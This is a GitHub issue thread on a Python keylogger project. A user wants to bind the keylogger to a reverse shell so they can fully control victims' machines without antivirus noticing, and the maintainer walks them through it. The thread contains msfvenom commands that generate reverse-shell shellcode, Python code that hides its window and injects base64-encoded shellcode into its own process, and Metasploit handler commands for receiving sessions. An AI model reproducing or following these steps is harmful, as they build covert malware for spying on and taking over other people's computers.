search

xp4xbox / Puffader

Python 2.7 is obsolete, please use https://github.com/xp4xbox/Python-Keylogger
MIT License
50 stars 27 forks source link

bind the puffader with reverse shell #46

Closed joker8989 closed 6 years ago

joker8989 commented 6 years ago

Hey i wanted to know if someone know how to bind the puufader keylogger with a reverse shell (get full access to the system - don't ask me why use reverse) and the keylogger is for keystrokes from every client/bot/slave i get...

the big problem is when i try to bind files is that AV runs 15 seconds of scans file (so the victim does need to be smart that he has been hacked.. )

xp4xbox commented 6 years ago

Check the readme. I included instructions for a undetectable meterpreter shell since it injects the shellcode into puffader itself, so the actual reverse shell never touches disk.

joker8989 commented 6 years ago

Ohh ty did not notice..

joker8989 commented 6 years ago

But will the puffader run on the victim system i know myself how to create FUD py file (or meterpreter)???

xp4xbox commented 6 years ago

Yeah it will.

joker8989 commented 6 years ago

Hey man i have some issues with set this up :

  1. run : msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c
  2. copy the shellcode to "base64encoder.py"
  3. i run "base64encoder.py"
  4. paste in "Puffader_Code_Addition.py" what's print in "base64encoder.py"
  5. run "Puffader_Code_Addition.py"

the file that's created is pyc and can't convert to exe ... (i think the error: compile():string without null bytes..")

any kind of help?

xp4xbox commented 6 years ago

You don't run Puffader_Code_Addition. Did you make sure to move the code_injector module to same dir when compiling?

Your puffader.py should look something like this:

def hide():
    window = win32console.GetConsoleWindow()
    win32gui.ShowWindow(window, 0)
    return True
# hide window as new thread. Necessary in order to define timer used later
objTimer = threading.Timer(0, hide); objTimer.start()

# function to prevent multiple instances
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    mutex = None
    exit()

import code_injector, base64
# base64 shellcode
b64shellcode = "/OiCAAAAYInlMcBki1Awi1IMi1fYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdykAEAACnEVFBoKYBrAP/VagpowKgKI2gCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/0ezoYQAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0iWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCTpcf///wHDKcZ1x8O78LWiVmoAU//V"
shellcode = base64.b64decode(b64shellcode)  # decrypt shellcode
pid = os.getpid()  # get current pid

code_injector.InjectShellCode(pid, shellcode)

def GetExIp():  # function to get external ip
    global strExIP
    try:
        strExIP = urlopen("http://ident.me").read().decode('utf8')
    except:
        strExIP = "?"
# obj defined for later use for screenshot timer
objTimer2 = threading.Timer(0, GetExIp); objTimer2.start()
joker8989 commented 6 years ago

Yep there r in the same location (like i downloaded it) puuf_code_addion and code_injector r in the same place... But did i type it right?

msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c

Can u please tell me the steps how to do it its not clear in the readme :(

xp4xbox commented 6 years ago

yeah the msfvenom command is right. the puffader_code_addition is just the code that needs to be added to the actual puffader.py. You dont need a pyc file. Py2exe will automatically include the code_injector module as long as its in the same dir.

xp4xbox commented 6 years ago

Can you show me your puffader.py code?

joker8989 commented 6 years ago

Yea when i ll back home like in 2 hours..

joker8989 commented 6 years ago

ok so what did i do : (before pasting the puffader.py code)

  1. generate shellcode : msfvenom -p windows/shell_reverse_tcp LHOST=a.b.c.d LPORT=4444 -f c

  2. run base64encoder.py with the shellcode inside...

  3. move the all files in the same dir

  4. paste the puufader_code_addional.py to puffader.py between function hide and function getEXip..

what's generated from base64encoder.py is : python base64encoder.py

aW1wb3J0IGJhc2U2NCxzIgoieXM7ZXhlYyhiYXNlNjQuIgoiYjY0ZGVjb2RlKHsyOnN0IgoiciwzOmxhbWJkYSBiOmJ5IgoidGVzKGIsJ1VURi04Jyl9IgoiW3N5cy52ZXJzaW9uX2luIgoiZm9bMF1dKCdhVzF3YjNKIgoiMElITnZZMnRsZEN4emRIIgoiSjFZM1FzZEdsdFpRcG1iIgoiM0lnZUNCcGJpQnlZVzVuIgoiWlNneE1DazZDZ2wwY25rIgoiNkNna0pjejF6YjJOclpYIgoiUXVjMjlqYTJWMEtESXNjIgoiMjlqYTJWMExsTlBRMHRmIgoiVTFSU1JVRk5LUW9KQ1hNIgoidVkyOXVibVZqZENnb0oyIgoicHZhMlZ5T0RnNE9DNWtiIgoibk0xTXk1aWFYb25MRFEwIgoiTkRRcEtRb0pDV0p5WldGIgoickNnbGxlR05sY0hRNkNnIgoia0pkR2x0WlM1emJHVmxjIgoiQ2cxS1Fwc1BYTjBjblZqIgoiZEM1MWJuQmhZMnNvSno1IgoiSkp5eHpMbkpsWTNZb05DIgoia3BXekJkQ21ROWN5NXlaIgoiV04yS0d3cENuZG9hV3hsIgoiSUd4bGJpaGtLVHhzT2dvIgoiSlpDczljeTV5WldOMktHIgoid3RiR1Z1S0dRcEtRcGxlIgoiR1ZqS0dRc2V5ZHpKenB6IgoiZlNrSycpKSk=

the real code:

def hide():
    window = win32console.GetConsoleWindow()
    win32gui.ShowWindow(window, 0)
    return True
# hide window as new thread. Necessary in order to define timer used later
objTimer = threading.Timer(0, hide); objTimer.start()

# function to prevent multiple instances
mutex = win32event.CreateMutex(None, 1, "PA_mutex_xp4")
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    mutex = None
    exit()

import os, code_injector, base64
# base64 shellcode
b64shellcode = "aW1wb3J0IGJhc2U2NCxzIgoieXM7ZXhlYyhiYXNlNjQuIgoiYjY0ZGVjb2RlKHsyOnN0IgoiciwzOmxhbWJkYSBiOmJ5IgoidGVzKGIsJ1VURi04Jyl9IgoiW3N5cy52ZXJzaW9uX2luIgoiZm9bMF1dKCdhVzF3YjNKIgoiMElITnZZMnRsZEN4emRIIgoiSjFZM1FzZEdsdFpRcG1iIgoiM0lnZUNCcGJpQnlZVzVuIgoiWlNneE1DazZDZ2wwY25rIgoiNkNna0pjejF6YjJOclpYIgoiUXVjMjlqYTJWMEtESXNjIgoiMjlqYTJWMExsTlBRMHRmIgoiVTFSU1JVRk5LUW9KQ1hNIgoidVkyOXVibVZqZENnb0oyIgoicHZhMlZ5T0RnNE9DNWtiIgoibk0xTXk1aWFYb25MRFEwIgoiTkRRcEtRb0pDV0p5WldGIgoickNnbGxlR05sY0hRNkNnIgoia0pkR2x0WlM1emJHVmxjIgoiQ2cxS1Fwc1BYTjBjblZqIgoiZEM1MWJuQmhZMnNvSno1IgoiSkp5eHpMbkpsWTNZb05DIgoia3BXekJkQ21ROWN5NXlaIgoiV04yS0d3cENuZG9hV3hsIgoiSUd4bGJpaGtLVHhzT2dvIgoiSlpDczljeTV5WldOMktHIgoid3RiR1Z1S0dRcEtRcGxlIgoiR1ZqS0dRc2V5ZHpKenB6IgoiZlNrSycpKSk="
shellcode = base64.b64decode(b64shellcode)  # decrypt shellcode
pid = os.getpid()  # get current pid

code_injector.InjectShellCode(pid, shellcode)  # inject the shellcode into the program

def GetExIp():  # function to get external ip
    global strExIP
    try:
        strExIP = urlopen("http://ident.me").read().decode('utf8')
    except:
        strExIP = "?"
# obj defined for later use for screenshot timer
objTimer2 = threading.Timer(0, GetExIp); objTimer2.start()
xp4xbox commented 6 years ago

I just built it with no problems.

btw instead of windows/shell_reverse_tcp, windows/meterpreter/reverse_tcp is better.

joker8989 commented 6 years ago

And u got a connection from the client? I will look at this soon very strange i am glad to hear that's it only for me not working...

i succeded i created exe file with pyinstaller with meterpreter/reverse_tcp ....

but i dont get a connection i execute the program set in the msfconsole all i need and nothing...

i get always "the program sttoped working"

can someone help me? i get always

"file.exe has stopped working"

tried to convert with pyinstaller and py2exe... did someone get a connection from the puufader file that include meterpreter plugin?

Do u have skype ? It will be more easier to resolve the problem...

xp4xbox commented 6 years ago

Next time edit your comments as one. For msfconsole did you make sure to type: 

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IPHERE
set LPORT 4444
set ExitOnSession false
exploit -j -z

I don't have skype unfortunately, but I have your email.

joker8989 commented 6 years ago

Of course i did it... except setExitSession false So send me a email to have u and i will send u avideo or something its will be more easy..

but its not explaning the reason that the "program has stopped working...."

@xp4xbox what's your email?